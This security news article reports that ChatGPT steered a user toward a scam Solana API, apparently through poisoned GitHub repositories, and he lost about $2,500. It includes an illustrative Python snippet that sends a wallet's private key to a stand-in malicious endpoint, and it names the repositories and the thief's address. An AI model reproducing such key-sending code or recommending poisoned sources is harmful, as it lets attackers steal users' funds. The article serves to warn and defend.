There is no evidence to show whether this was deliberate poisoning targeted at GPT or whether GPT collected it on its own.
Written by: shushu
Recently, a user who asked ChatGPT for code help while building an automated posting bot for pump.fun unexpectedly fell victim to an online scam. Following the code instructions ChatGPT provided, he accessed a recommended Solana API website. That site turned out to be a scam platform, and the user lost approximately $2,500.
According to the user, part of the code required submitting his private key via the API. Because he was in a hurry, he used his main Solana wallet without reviewing the code. In hindsight he recognizes this was a serious mistake, but at the time his trust in OpenAI led him to overlook the risk.
Once the API was used, the scammers acted quickly: within just 30 minutes, all assets in the user's wallet were transferred to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX. At first the user was not certain the website itself was the problem, but after closely inspecting the domain's homepage he found clear signs that it was suspicious.
The user is now calling on the community to help block this website (@solana) and to have the related information removed from the @OpenAI platform so that more people are not harmed. He also hopes that investigating the clues the scammers left behind will bring them to justice.
Scam Sniffer has identified malicious code repositories designed to steal private keys through AI-generated code, including:
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
GitHub user 'solanaapisdev' has created multiple repositories over the past four months in an attempt to steer AI models into generating malicious code.
The user's private key was stolen because the code sent it directly to the phishing website in the body of an HTTP request.
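To make the failure mode concrete, here is a minimal Python sketch of the kind of pattern described above. The endpoint, field names, and parameters are hypothetical illustrations, not the actual scam site's API; the core flaw is that the wallet's secret key leaves the user's machine inside an HTTP request body.

```python
import requests

# NEVER do this: a base58-encoded Solana secret key held in plaintext
# and about to be sent over the network.
PRIVATE_KEY = "<base58-encoded secret key>"

# Whoever operates this endpoint (or can read its traffic or logs) now
# has full control of the wallet -- exactly what happened in this case.
resp = requests.post(
    "https://malicious-solana-api.example/api/trade",  # hypothetical URL
    json={
        "private_key": PRIVATE_KEY,      # secret key sent in the request body
        "action": "buy",
        "mint": "<token mint address>",  # hypothetical parameter
        "amount_sol": 0.5,
    },
    timeout=30,
)
print(resp.status_code, resp.text)
```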
SlowMist founder Yu Xian commented: "These are all very unsafe practices, all forms of 'poisoning': not only having users upload private keys, but also generating private keys online for users to use. The documentation is even written to look quite convincing."
He also noted that these malicious code websites offer very little contact information, and that the official site has essentially no content, consisting mainly of documentation plus code repositories. "The domain was registered at the end of September, which inevitably raises the suspicion of premeditated poisoning, but there is no evidence to show whether this was deliberate poisoning targeted at GPT or whether GPT collected it on its own."
Scam Sniffer offers the following security suggestions for AI-assisted code:
• Never blindly use AI-generated code
• Always carefully review the code
• Keep private keys in an offline environment (see the sketch after this list for a safer handling pattern)
• Only use trusted sources
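As a contrast to the dangerous pattern above, here is a minimal sketch of a safer approach, under these assumptions: the secret key lives in a standard local solana-cli keypair file, signing happens locally (illustrated with the `solders` library), and only the already-signed transaction is submitted to a public RPC endpoint. The file path and the omitted signing step are placeholders, not a complete bot.

```python
import json
import requests
from solders.keypair import Keypair  # assumes the solders package is installed

# 1. Load the secret key from a local keypair file (the standard
#    solana-cli format: a JSON array of 64 bytes). The key itself
#    never appears in any request body.
with open("/path/to/id.json") as f:
    keypair = Keypair.from_bytes(bytes(json.load(f)))

# 2. Build and sign the transaction locally. Details are omitted here;
#    the point is that signing uses the local key, and only the
#    resulting signed bytes ever leave the machine.
signed_tx_base64 = "<base64-encoded signed transaction>"  # placeholder

# 3. Submit only the signed transaction via the public JSON-RPC
#    `sendTransaction` method.
resp = requests.post(
    "https://api.mainnet-beta.solana.com",
    json={
        "jsonrpc": "2.0",
        "id": 1,
        "method": "sendTransaction",
        "params": [signed_tx_base64, {"encoding": "base64"}],
    },
    timeout=30,
)
print(resp.json())
```

Any API that instead asks for the private key itself, as the repositories above do, should be treated as hostile.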